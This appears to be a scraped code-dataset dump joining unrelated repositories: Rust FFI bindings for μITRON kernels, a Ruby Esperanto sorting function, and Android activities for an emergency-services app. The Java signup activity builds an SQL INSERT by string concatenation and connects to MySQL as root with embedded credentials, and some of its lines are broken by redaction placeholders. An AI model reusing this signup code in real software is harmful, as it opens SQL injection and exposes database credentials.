    pub fn get_inf(p_exinf: *mut isize) -> ER;
    pub fn ref_tsk(tskid: ID, pk_rtsk: *mut T_RTSK) -> ER;
}
/// Task management functions (multiprocessor variants)
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
extern "C" {
    pub fn mact_tsk(tskid: ID, prcid: ID) -> ER;
    pub fn mig_tsk(tskid: ID, prcid: ID) -> ER;
}
// Dynamic task creation/deletion (`dcre` extension)
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
    pub fn acre_tsk(pk_ctsk: *const T_CTSK) -> ER_ID;
    pub fn del_tsk(tskid: ID) -> ER;
}
// Task subpriority management
#[cfg(any(
    all(feature = "asp3", feature = "subprio"),
    feature = "fmp3",
    feature = "solid_fmp3"
))]
extern "C" {
    pub fn chg_spr(tskid: ID, subpri: uint_t) -> ER;
}
/// Task synchronization functions
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
extern "C" {
    pub fn slp_tsk() -> ER;
    pub fn tslp_tsk(tmout: TMO) -> ER;
    pub fn wup_tsk(tskid: ID) -> ER;
    pub fn can_wup(tskid: ID) -> ER_UINT;
    pub fn rel_wai(tskid: ID) -> ER;
    pub fn sus_tsk(tskid: ID) -> ER;
    pub fn rsm_tsk(tskid: ID) -> ER;
    pub fn dly_tsk(dlytim: RELTIM) -> ER;
}
/// Task termination functions
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
extern "C" {
    pub fn ext_tsk() -> ER;
    pub fn ras_ter(tskid: ID) -> ER;
    pub fn dis_ter() -> ER;
    pub fn ena_ter() -> ER;
    pub fn sns_ter() -> bool_t;
    pub fn ter_tsk(tskid: ID) -> ER;
}
/// Terminate and delete the calling task
#[cfg(any(
    all(feature = "solid_asp3", feature = "exd_tsk"),
    all(feature = "solid_fmp3", feature = "exd_tsk")
))]
extern "C" {
    pub fn exd_tsk() -> ER;
}
<file_sep>/README.md
# `itron`
<a href="https://docs.rs/itron/"><img src="https://docs.rs/itron/badge.svg" alt="docs.rs"></a> <a href="https://solid-rs.github.io/itron-rs/doc/itron_asp3/index.html" label="Per-kernel documentation"><img src="https://solid-rs.github.io/itron-rs/doc/badge.svg"></a> <a href="https://crates.io/crates/itron"><img src="https://img.shields.io/crates/v/itron"></a> <img src="https://img.shields.io/badge/license-0BSD-blue">
A [Rust] interface to interact with operating systems based on [μITRON] or its derivative.
[Rust]: https://www.rust-lang.org/
[μITRON]: http://ertl.jp/ITRON/SPEC/mitron4-e.html
This is not an officially supported project.
## Examples
`Cargo.toml`:
```toml
[dependencies]
itron = { version = "0.1.0", features = ["asp3", "dcre"] }
```
Using the low-level binding:
```rust
use core::{mem, ptr};
use itron::abi::{acre_tsk, TA_ACT, T_CTSK, EXINF, ID};
fn create_task(param: isize) -> ID {
extern "C" fn task_body(exinf: EXINF) {
let _param = unsafe { exinf.assume_init() };
}
let er = unsafe {
acre_tsk(&T_CTSK {
tskatr: TA_ACT,
exinf: mem::MaybeUninit::new(param),
task: Some(task_body),
itskpri: 4,
stksz: 2048,
stk: ptr::null_mut(),
})
};
assert!(er >= 0, "could not create a task (error {})", er);
er
}
```
Using the safe, high-level binding (experimental, requires `unstable` feature):
```rust
use itron::task;
fn create_task(param: isize) -> task::Task {
let task_body = move || {
let _param = param;
};
let new_task = task::Task::build()
.start(task_body)
.stack_size(2048)
.initial_priority(4)
.finish()
.expect("could not create a task");
new_task.as_ref().activate().unwrap();
new_task
}
```
<file_sep>/CHANGELOG.md
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
## [Unreleased]
- **Changed:** `itron::task::Task::{set_priority → set_base_priority}`
## [0.1.9] - 2021-11-19
- Documentation update
## [0.1.8] - 2021-10-01
- **Fixed:** `itron::abi::exd_tsk` shouldn't be exposed unless `cfg(feature = "exd_tsk")`
- **Fixed:** Require `Send`-ness for the `impl IntoClosure` passed to `task::Builder::start`
## [0.1.7] - 2021-07-01
- **Fixed:** The macros in `itron::macros::match_kernel` did not match anything
## [0.1.6] - 2021-07-01
- **Added:** `itron::macros::{match_kernel, tt_is_kernel}` now support OR patterns
- **Fixed:** The macros in `itron::macros::*` now locate `tt_call` correctly
## [0.1.5] - 2021-07-01
- **Added:** `itron::processor::Processor` now implements `TryFrom<usize>`
- **Added:** `itron::macros`
- **Added:** `itron::{dataqueue, messagebuffer}::Info::is_empty`
## [0.1.4] - 2021-06-30
- **Changed:** `itron::task::Builder::{stack → stack_size}`
- **Changed:** `itron::{processor, task::{Task::activate_on, Builder::initial_processor}}`, etc. are now exposed on uniprocessor kernels
- **Added:** `itron::abi::{acre_cyc, acre_alm, acre_isr}`
- **Added:** `itron::abi::acre_mpf` when `cfg(all(feature = "solid_asp3", feature = "dcre"))`
- **Added:** `itron::abi::exd_tsk`
- **Added:** `itron::task::Builder::finish_and_activate`
- **Added:** `itron::task::TaskRef::migrate`
- **Added:** `itron::memorypool::MemoryPool[Ref]`
- **Added:** `itron::messagebuffer::MessageBuffer[Ref]`
## [0.1.3] - 2021-06-23
- **Added:** `itron::abi::E_OK`
- **Added:** `itron::dataqueue::Dataqueue[Ref]`
- **Changed:** `itron::processor::current` now returns `Result<Processor, _>` instead of `Result<Option<abi::NonNullID>, _>`.
## [0.1.2] - 2021-06-21
- **Added:** `itron::{mutex::TryLockError, semaphore::PollError}::Timeout`
## [0.1.1] - 2021-06-21
- **Added:** `itron::abi::{TA_TPRI, TA_WMUL, TA_CLR, TA_RTSK, TA_CEILING, TWF_*, TTW_*}`
- **Added:** `itron::semaphore::Semaphore[Ref]`
- **Added:** `itron::mutex::Mutex[Ref]`
- **Added:** `itron::processor`
- **Added:** `itron::abi::{*_mbf}` (message buffers) and Cargo feature `messagebuf`
- **Added:** `itron::abi::{*_ovr}` (overrun handlers) and Cargo feature `ovrhdr`
- **Added:** `itron::abi::chg_spr` (change task subpriority) and Cargo feature `subprio`
- **Added:** `itron::abi::TA_INHERIT` (priority inheritance mutexes) and Cargo feature `pi_mutex`
- **Added:** Cargo features `fmp3`, `solid_asp3`, and `solid_fmp3`
## 0.1.0 - 2021-06-15
- Initial release.
[Unreleased]: https://github.com/solid-rs/itron-rs/compare/0.1.9...main
[0.1.9]: https://github.com/solid-rs/itron-rs/compare/0.1.8...0.1.9
[0.1.8]: https://github.com/solid-rs/itron-rs/compare/0.1.7...0.1.8
[0.1.7]: https://github.com/solid-rs/itron-rs/compare/0.1.6...0.1.7
[0.1.6]: https://github.com/solid-rs/itron-rs/compare/0.1.5...0.1.6
[0.1.5]: https://github.com/solid-rs/itron-rs/compare/0.1.4...0.1.5
[0.1.4]: https://github.com/solid-rs/itron-rs/compare/0.1.3...0.1.4
[0.1.3]: https://github.com/solid-rs/itron-rs/compare/0.1.2...0.1.3
[0.1.2]: https://github.com/solid-rs/itron-rs/compare/0.1.1...0.1.2
[0.1.1]: https://github.com/solid-rs/itron-rs/compare/0.1.0...0.1.1
<file_sep>/src/abi/mempool.rs
use super::{uint_t, ATR, ER, ER_ID, ID, MPF_T, TMO};
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RMPF {
    /// ID number of the task at the head of the fixed-size memory pool's
    /// wait queue
    pub wtskid: ID,
    /// Number of fixed-size memory blocks that can still be allocated from
    /// the free space of the memory pool area
    pub fblkcnt: uint_t,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CMPF {
    /// Fixed-size memory pool attributes
    pub mpfatr: ATR,
    /// Number of fixed-size memory blocks that can be acquired
    pub blkcnt: uint_t,
    /// Size of each fixed-size memory block
    pub blksz: uint_t,
    /// Start address of the fixed-size memory pool area
    pub mpf: *mut MPF_T,
    /// Start address of the fixed-size memory pool management area
    pub mpfmb: *mut u8,
}
/// Memory pool management functions
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
extern "C" {
    pub fn get_mpf(mpfid: ID, p_blk: *mut *mut u8) -> ER;
    pub fn pget_mpf(mpfid: ID, p_blk: *mut *mut u8) -> ER;
    pub fn tget_mpf(mpfid: ID, p_blk: *mut *mut u8, tmout: TMO) -> ER;
    pub fn rel_mpf(mpfid: ID, blk: *mut u8) -> ER;
    pub fn ini_mpf(mpfid: ID) -> ER;
    pub fn ref_mpf(mpfid: ID, pk_rmpf: *mut T_RMPF) -> ER;
}
/// Memory pool management functions (dynamic creation/deletion)
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
    pub fn acre_mpf(pk_cmpf: *const T_CMPF) -> ER_ID;
    pub fn del_mpf(mpfid: ID) -> ER;
}
<file_sep>/src/kernel.rs
//! Miscellaneous functions that are not associated to specific kernel objects.
#[cfg(any())]
use crate::error::Kind;
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind},
};
define_error_kind! {
    /// Error type for [`exit`].
    pub enum ExitError {
        // `cfg(any())` is never true: kept for kernels with access control.
        #[cfg(any())]
        AccessDenied,
    }
}
impl ErrorKind for ExitError {
    /// Map a raw kernel error code to an `ExitError` variant, or `None`
    /// for codes this operation does not report.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // `E_SYS` is a critical error, so it's excluded from here
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
// TODO: rot_rdq
// TODO: mrot_rdq
// TODO: get_lod
// TODO: mget_lod
// TODO: get_nth
// TODO: mget_nth
// TODO: loc_cpu
// TODO: unl_cpu
// TODO: dis_dsp
// TODO: ena_dsp
/// `sns_ctx`: Get a flag indicating whether the current thread is in a task
/// context.
#[inline]
#[doc(alias = "sns_ctx")]
pub fn is_task_context() -> bool {
    match () {
        #[cfg(not(feature = "none"))]
        // `sns_ctx` reports a truthy value for a *non-task* context, hence
        // the comparison with zero.
        () => (unsafe { abi::sns_ctx() } == 0),
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `sns_loc`: Get a flag indicating whether the CPU lock state is active.
#[inline]
#[doc(alias = "sns_loc")]
pub fn is_cpu_lock_active() -> bool {
    match () {
        #[cfg(not(feature = "none"))]
        () => (unsafe { abi::sns_loc() } != 0),
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `sns_dsp`: Get a flag indicating whether dispatching is disabled.
#[inline]
#[doc(alias = "sns_dsp")]
pub fn is_dispatching_disabled() -> bool {
    match () {
        #[cfg(not(feature = "none"))]
        () => (unsafe { abi::sns_dsp() } != 0),
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `sns_dpn`: Get a flag indicating whether the dispatch pending state is
/// active.
#[inline]
#[doc(alias = "sns_dpn")]
pub fn is_dispatch_pending_active() -> bool {
    match () {
        #[cfg(not(feature = "none"))]
        () => (unsafe { abi::sns_dpn() } != 0),
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `sns_ker`: Get a flag indicating whether the kernel is in an operational
/// state.
///
/// If this function returns `false`, all kernel API functions except for
/// `sns_ker` are unsafe to call.
#[inline]
#[doc(alias = "sns_ker")]
pub fn is_operational() -> bool {
    match () {
        #[cfg(not(feature = "none"))]
        // `sns_ker` reports a truthy value while the kernel is *not*
        // operational, hence the comparison with zero.
        () => (unsafe { abi::sns_ker() } == 0),
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
/// `ext_ker`: Terminate the kernel.
///
/// This function will not return if it succeeds; if it fails, it returns
/// the error reported by the kernel.
#[inline]
#[doc(alias = "ext_ker")]
pub fn exit() -> Error<ExitError> {
    match () {
        #[cfg(not(feature = "none"))]
        // If `ext_ker` comes back at all, its result is an error code.
        () => unsafe { Error::new_unchecked(ErrorCode::new_unchecked(abi::ext_ker())) },
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
| e57b655a7de61eac9ae23bfd001f128156ae2298 | [
"TOML",
"Rust",
"Markdown"
] | 35 | Rust | kawadakk/itron-rs | 5167f5ef0cf1624ce52299f27bbed2654fd1c90f | 7f7b525164e2c2927ab8e8743a40b9f9f47e614d |
refs/heads/master | <file_sep>require 'pry'
# Sorts an array of Esperanto words according to the Esperanto alphabet
# (which orders ĉ after c, ĝ after g, and so on).
#
# arr - Array of String phrases composed of Esperanto letters.
#
# Returns a new sorted Array. Characters outside the alphabet sort after
# all known letters instead of raising an ArgumentError (previously any
# unknown character mapped to nil and broke the comparison).
def alphabetize(arr)
  esperanto_alphabet = "abcĉdefgĝhĥijĵklmnoprsŝtuŭvz".chars
  # Precompute letter ranks once instead of scanning the alphabet per char.
  rank = esperanto_alphabet.each_with_index.to_h
  arr.sort_by do |phrase|
    phrase.chars.map { |c| rank.fetch(c, esperanto_alphabet.length) }
  end
end
| 1bae1f1245a70f72f5d2fbfbee3688d9040859e8 | [
"Ruby"
] | 1 | Ruby | wesleyfriedman/alphabetize-in-esperanto-web-0916 | c777fb666bb32e0dcfbc430087ffda628270e06b | 49ad66c5a79f638bc8c302d79fbb5f5eaba9ed49 |
refs/heads/master | <file_sep>package com.example.emergencyservices;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.content.SharedPreferences;
import android.os.AsyncTask;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import android.widget.Toast;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
public class Request_userDetailsActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_request_user_details);
int request_user_id = getIntent().getIntExtra("Request_userid",-1);
String request_address = getIntent().getStringExtra("Request_address");
final int request_id = getIntent().getIntExtra("Request_id",-1);
GetRequestsDetails(request_address,request_user_id);
Button accept = (Button)findViewById(R.id.save_id);
SharedPreferences sp;
sp = getSharedPreferences("login",MODE_PRIVATE);
final String serviceprovider_name = sp.getString("UserName_service",null);
accept.setOnClickListener(new View.OnClickListener() {
public void onClick(View v) {
AcceptRequest(request_id,serviceprovider_name);
}
});
}
public AcceptRequestConnect ac;
public void AcceptRequest(int request_id,String serviceprovider_name){
ac = new AcceptRequestConnect(request_id,serviceprovider_name);
ac.execute();
}
/**
 * Background task that PUTs an "accept request" call to the backend and
 * reports the server's verdict on the UI thread.
 *
 * doInBackground returns the trimmed response body, or null when the call
 * failed at the connection level.
 */
public class AcceptRequestConnect extends AsyncTask<String,String,String>{
    int req_id_local;        // id of the request being accepted
    String ser_name_local;   // name of the accepting service provider

    AcceptRequestConnect(int req_id, String name){
        req_id_local = req_id;
        ser_name_local = name;
    }

    @Override
    protected String doInBackground(String... params){
        HttpURLConnection connection = null;
        BufferedReader reader = null;
        try{
            // NOTE(review): backend address is hard-coded; consider moving it
            // to a single shared configuration value.
            String ip = "172.16.101.50";
            String serverURL = "http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/accept_request/"+req_id_local+"/"+ser_name_local;
            URL url = new URL(serverURL);
            connection = (HttpURLConnection) url.openConnection();
            connection.setRequestMethod("PUT");
            connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
            InputStream is = connection.getInputStream();
            reader = new BufferedReader(new InputStreamReader(is));
            StringBuilder total = new StringBuilder();
            String line;
            while ((line = reader.readLine()) != null)
            {
                total.append(line);
            }
            return total.toString().trim();
        }
        catch(MalformedURLException e){
            e.printStackTrace();
        }
        catch (IOException e){
            e.printStackTrace();
        }
        catch (Exception e){
            e.printStackTrace();
        }
        finally {
            // Fix: the original only closed the stream on the success path and
            // never disconnected, leaking the connection on every error.
            if (reader != null) {
                try {
                    reader.close();
                } catch (IOException ignored) {
                }
            }
            if (connection != null) {
                connection.disconnect();
            }
        }
        return null;
    }

    @Override
    protected void onPostExecute(String s) {
        // Map each sentinel string the backend returns to a user-visible outcome.
        if(s==null){
            Log.d("Request_detailsActivity", "Some error has occurred at Server or connection error");
        }
        else if(s.equals("invalid") || s.equals("req_id is becoming -1")){
            Log.e("Request_detailsActivity","Request cancelled");
            Toast.makeText(Request_userDetailsActivity.this,"Request cancelled",Toast.LENGTH_LONG).show();
        }
        else if(s.equals("SQL Exception")){
            Log.e("Request_detailsActivity", "Some error has occurred at Server");
            Toast.makeText(Request_userDetailsActivity.this,"Some error has occurred at Server",Toast.LENGTH_LONG).show();
        }
        else if(s.equals("valid")){
            // Accepted: return to the provider's main screen.
            Intent i = new Intent(Request_userDetailsActivity.this,Main_seviceproviderActivity.class);
            startActivity(i);
            Log.d("Request_detailsActivity", "Request Succesful");
        }
        else{
            Log.e("Request_detailsActivity", "Data from Server: " + s);
            Toast.makeText(Request_userDetailsActivity.this,"Can't accept request",Toast.LENGTH_LONG).show();
        }
    }

    @Override
    protected void onCancelled() {
        ac = null;
    }
}
// Handle to the in-flight details-fetch task (nulled in onCancelled).
public GetRequestsDetailsConnect gc;

/** Launches a background fetch of the requesting client's name and phone number. */
public void GetRequestsDetails(String address, int uid) {
    GetRequestsDetailsConnect task = new GetRequestsDetailsConnect(address, uid);
    gc = task;
    task.execute();
}
/**
 * Background task that GETs the requesting client's details (name, phone)
 * from the backend and fills the detail views on the UI thread.
 *
 * doInBackground returns the raw JSON body (trimmed), or null on failure.
 */
public class GetRequestsDetailsConnect extends AsyncTask<String,String,String> {
    String address,name_local,phno_local;  // address comes from the caller; name/phno are parsed from the response
    int user_id;                            // client whose details are fetched

    GetRequestsDetailsConnect(String a,int uid){
        address=a;
        user_id=uid;
    }

    @Override
    protected String doInBackground(String... params){
        HttpURLConnection connection = null;
        BufferedReader reader = null;
        try{
            // NOTE(review): backend address is hard-coded; consider moving it
            // to a single shared configuration value.
            String ip = "172.16.101.50";
            String serverURL = "http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/get_clientdetails/"+user_id;
            URL url = new URL(serverURL);
            connection = (HttpURLConnection) url.openConnection();
            connection.setRequestMethod("GET");
            connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
            InputStream is = connection.getInputStream();
            reader = new BufferedReader(new InputStreamReader(is));
            StringBuilder total = new StringBuilder();
            String line;
            while ((line = reader.readLine()) != null)
            {
                total.append(line);
            }
            line = total.toString().trim();
            System.out.println("line = "+line);
            // Pull the two fields we display out of the JSON payload.
            JSONObject jsonObj = new JSONObject(line);
            name_local = jsonObj.getString("name");
            phno_local = jsonObj.getString("phno");
            return line;
        }
        catch(MalformedURLException e){
            e.printStackTrace();
        }
        catch (IOException e){
            e.printStackTrace();
        }
        catch (Exception e){
            e.printStackTrace();
        }
        finally {
            // Fix: the original leaked the reader and connection on every
            // exception path (including JSON parse failures).
            if (reader != null) {
                try {
                    reader.close();
                } catch (IOException ignored) {
                }
            }
            if (connection != null) {
                connection.disconnect();
            }
        }
        return null;
    }

    @Override
    protected void onPostExecute(String s) {
        if(s==null){
            Log.d("Request_detailsActivity", "Some error has occurred at Server or connection error");
        }
        else if(s.equals("invalid") || s.equals("user_id is becoming -1")){
            Log.e("Request_detailsActivity", "Request cancelled");
            Toast.makeText(Request_userDetailsActivity.this,"Request cancelled",Toast.LENGTH_LONG).show();
        }
        else if(s.equals("Exception")){
            Log.e("Request_detailsActivity", "Some error has occurred at Server");
            Toast.makeText(Request_userDetailsActivity.this,"Some error has occurred at Server",Toast.LENGTH_LONG).show();
        }
        else
        {
            // Success: append the fetched values after the static labels.
            TextView nameText = (TextView) findViewById(R.id.name_serviceprovider_id);
            nameText.append(" "+name_local);
            TextView addressText = (TextView) findViewById(R.id.address_id);
            addressText.append(address);
            TextView phnoText = (TextView) findViewById(R.id.phno_serviceprovider_id);
            phnoText.append(" "+phno_local);
            Log.d("Request_detailsActivity", "Request Succesful");
        }
    }

    @Override
    protected void onCancelled() {
        gc = null;
    }
}
}
<file_sep>package com.example.emergencyservices;
import android.annotation.SuppressLint;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.os.StrictMode;
import android.util.Log;
import android.view.View;
import android.widget.AdapterView;
import android.widget.AdapterView.OnItemSelectedListener;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.EditText;
import android.widget.ProgressBar;
import android.widget.Spinner;
import android.widget.Toast;

import androidx.appcompat.app.AppCompatActivity;

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
public class SignupActivity_JDBC extends AppCompatActivity implements OnItemSelectedListener{
EditText name,phno,password;
Spinner bloodgrp;
ProgressBar pb;
Button signup_button,go_login;
Connection conn;
String un,pass,db,ip;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_signup);
name = (EditText)findViewById(R.id.signup_name_id);
phno = (EditText)findViewById(R.id.signup_phno_id);
password = (EditText)findViewById(R.id.signup_pass_id);
bloodgrp = (Spinner) findViewById(R.id.signup_bloodgrp_id);
pb = (ProgressBar)findViewById(R.id.signup_progressbar_id);
signup_button = findViewById(R.id.signup_button_id);
go_login = findViewById(R.id.signup_login_id);
pb.setVisibility(View.GONE);
ip="localhost";
//ip = "172.16.145.218";
// ip = "127.0.0.1";
db = "Emergencydb";
un = "root";
pass = "<PASSWORD>*";
// Spinner click listener
bloodgrp.setOnItemSelectedListener(this);
// Spinner Drop down elements
List<String> categories = new ArrayList<String>();
categories.add("Blood Group");
categories.add("A+");
categories.add("A-");
categories.add("B+");
categories.add("B-");
categories.add("O+");
categories.add("O-");
categories.add("AB+");
categories.add("AB-");
// Creating adapter for spinner
ArrayAdapter<String> dataAdapter = new ArrayAdapter<String>(this, android.R.layout.simple_spinner_item, categories);
// Drop down layout style - list view with radio button
dataAdapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item);
// attaching data adapter to spinner
bloodgrp.setAdapter(dataAdapter);
// signup_button.setOnClickListener(new View.OnClickListener() {
// @Override
// public void onClick(View v) {
// openMainActivity();
// }
// });
signup_button.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v){
CheckSignin checksignin = new CheckSignin();
checksignin.execute("");
}
});
go_login.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
openLoginActivity();
}
});
}
public class CheckSignin extends AsyncTask<String,String,String>{
String z = "";
Boolean is_success = false;
String username_local,password_local,phno_local,bloodgrp_local;
@Override
protected void onPreExecute(){
username_local = name.getText().toString();
password_local = <PASSWORD>.getText().toString();
phno_local = phno.getText().toString();
bloodgrp_local = bloodgrp.getSelectedItem().toString();
pb.setVisibility(View.VISIBLE);
}
@Override
protected String doInBackground(String... params){
if(username_local.trim().equals("")||password_local.trim().equals("")){
z = "Please enter Name or Password";
}
else{
try{
conn = connectionclass(un,pass,db,ip);
if(conn == null){
z = "Connection lost (Check Your Internet)";
}
else{
String query = "INSERT INTO users_client VALUES (0,"+username_local+","+password_local+","+phno_local+","+bloodgrp_local+")";
Statement stmt = conn.createStatement();
try{
stmt.executeUpdate(query);
}
catch (SQLException e){
z = "Name already exists";
return z;
}
}
}
catch(Exception ex){
is_success = false;
z = ex.getMessage();
}
}
return z;
}
@SuppressLint("NewApi")
public Connection connectionclass(String user, String password, String database, String server)
{
StrictMode.ThreadPolicy policy = new StrictMode.ThreadPolicy.Builder().permitAll().build();
StrictMode.setThreadPolicy(policy);
Connection connection = null;
String DB_URL,ConnectionURL;
try
{
Class.forName("com.mysql.jdbc.Driver");
DB_URL = "jdbc:mysql://"+server+":3306/"+database+"?verifyServerCertificate=false&useSSL=false";
// DB_URL = "jdbc:mysql://192.168.43.183:3306/workflowdb?verifyServerCertificate=false&useSSL=false";
System.out.println(DB_URL);
connection = (Connection)DriverManager.getConnection(DB_URL,user,password);
}
catch (SQLException se)
{
se.printStackTrace();
//Log.e("error here 1 : ", se.getMessage());
}
catch (ClassNotFoundException e)
{
Log.e("error here 2 : ", e.getMessage());
}
catch (Exception e)
{
Log.e("error here 3 : ", e.getMessage());
}
return connection;
}
@Override
protected void onPostExecute(String r){
pb.setVisibility(View.GONE);
Toast.makeText(SignupActivity_JDBC.this,r,Toast.LENGTH_SHORT).show();
if(is_success){
Toast.makeText(SignupActivity_JDBC.this,"Signup Successful",Toast.LENGTH_LONG).show();
}
}
}
@Override
public void onItemSelected(AdapterView<?> parent, View view, int position, long id) {
// On selecting a spinner item
String item = parent.getItemAtPosition(position).toString();
// Showing selected spinner item
Toast.makeText(parent.getContext(), "Selected: " + item, Toast.LENGTH_LONG).show();
}
public void onNothingSelected(AdapterView<?> arg0) {
}
public void openMainActivity(){
Intent i = new Intent(this,MainActivity.class);
startActivity(i);
}
public void openLoginActivity(){
Intent i = new Intent(this,LoginActivity.class);
startActivity(i);
}
}
<file_sep>package com.example.emergencyservices;
import androidx.appcompat.app.AppCompatActivity;
import android.content.SharedPreferences;
import android.os.AsyncTask;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
import android.widget.Toast;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
/**
 * Read-only detail screen for a past (already handled) request: fetches the
 * client's name and phone number from the backend and shows them together
 * with the request address passed in via the launching Intent.
 */
public class Past_user_detailsActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_past_user_details);
        int request_user_id = getIntent().getIntExtra("Request_userid",-1);
        String request_address = getIntent().getStringExtra("Request_address");
        // Fix: dropped the request-id and SharedPreferences locals the original
        // read and never used.
        GetRequestsDetails(request_address,request_user_id);
    }

    // Handle to the in-flight details-fetch task (nulled in onCancelled).
    public GetRequestsDetailsConnect gc;

    /** Launches a background fetch of the client's name and phone number. */
    public void GetRequestsDetails(String address,int uid){
        gc = new GetRequestsDetailsConnect(address,uid);
        gc.execute();
    }

    /**
     * Background task that GETs the client's details and fills the detail
     * views. doInBackground returns the raw JSON body, or null on failure.
     */
    public class GetRequestsDetailsConnect extends AsyncTask<String,String,String> {
        String address,name_local,phno_local;
        int user_id;

        GetRequestsDetailsConnect(String a,int uid){
            address=a;
            user_id=uid;
        }

        @Override
        protected String doInBackground(String... params){
            HttpURLConnection connection = null;
            BufferedReader reader = null;
            try{
                // NOTE(review): backend address is hard-coded; consider a
                // single shared configuration value.
                String ip = "172.16.101.50";
                String serverURL = "http://"+ip+":8080/EmergencyServicesBackend/webapi/resource/get_clientdetails/"+user_id;
                URL url = new URL(serverURL);
                connection = (HttpURLConnection) url.openConnection();
                connection.setRequestMethod("GET");
                connection.setRequestProperty("Content-Type", "text/plain; charset=UTF-8");
                InputStream is = connection.getInputStream();
                reader = new BufferedReader(new InputStreamReader(is));
                StringBuilder total = new StringBuilder();
                String line;
                while ((line = reader.readLine()) != null)
                {
                    total.append(line);
                }
                line = total.toString().trim();
                System.out.println("line = "+line);
                JSONObject jsonObj = new JSONObject(line);
                name_local = jsonObj.getString("name");
                phno_local = jsonObj.getString("phno");
                return line;
            }
            catch(MalformedURLException e){
                e.printStackTrace();
            }
            catch (IOException e){
                e.printStackTrace();
            }
            catch (Exception e){
                e.printStackTrace();
            }
            finally {
                // Fix: the original leaked the reader and connection on every
                // exception path.
                if (reader != null) {
                    try {
                        reader.close();
                    } catch (IOException ignored) {
                    }
                }
                if (connection != null) {
                    connection.disconnect();
                }
            }
            return null;
        }

        @Override
        protected void onPostExecute(String s) {
            if(s==null){
                Log.d("Past_detailsActivity", "Some error has occurred at Server or connection error");
            }
            else if(s.equals("invalid") || s.equals("user_id is becoming -1")){
                Log.e("Past_detailsActivity", "Request cancelled");
                Toast.makeText(Past_user_detailsActivity.this,"Request cancelled",Toast.LENGTH_LONG).show();
            }
            else if(s.equals("Exception")){
                Log.e("Past_detailsActivity", "Some error has occurred at Server");
                Toast.makeText(Past_user_detailsActivity.this,"Some error has occurred at Server",Toast.LENGTH_LONG).show();
            }
            else
            {
                // Success: append the fetched values after the static labels.
                TextView nameText = (TextView) findViewById(R.id.name_serviceprovider_id);
                nameText.append(" "+name_local);
                TextView addressText = (TextView) findViewById(R.id.address_id);
                addressText.append(address);
                TextView phnoText = (TextView) findViewById(R.id.phno_serviceprovider_id);
                phnoText.append(" "+phno_local);
                Log.d("Past_detailsActivity", "Request Succesful");
            }
        }

        @Override
        protected void onCancelled() {
            gc = null;
        }
    }
}
<file_sep>package com.example.emergencyservices;
import androidx.annotation.NonNull;
import androidx.appcompat.app.AppCompatActivity;
import android.Manifest;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.pm.PackageManager;
import android.location.Location;
import android.location.LocationListener;
import android.location.LocationManager;
import android.os.AsyncTask;
import android.os.Build;
import android.os.Bundle;
import android.provider.Settings;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import android.widget.ImageButton;
import android.widget.Toast;
import android.location.Address;
import android.location.Geocoder;
import org.json.JSONObject;
import java.io.BufferedReader;
import java.io.IOException;
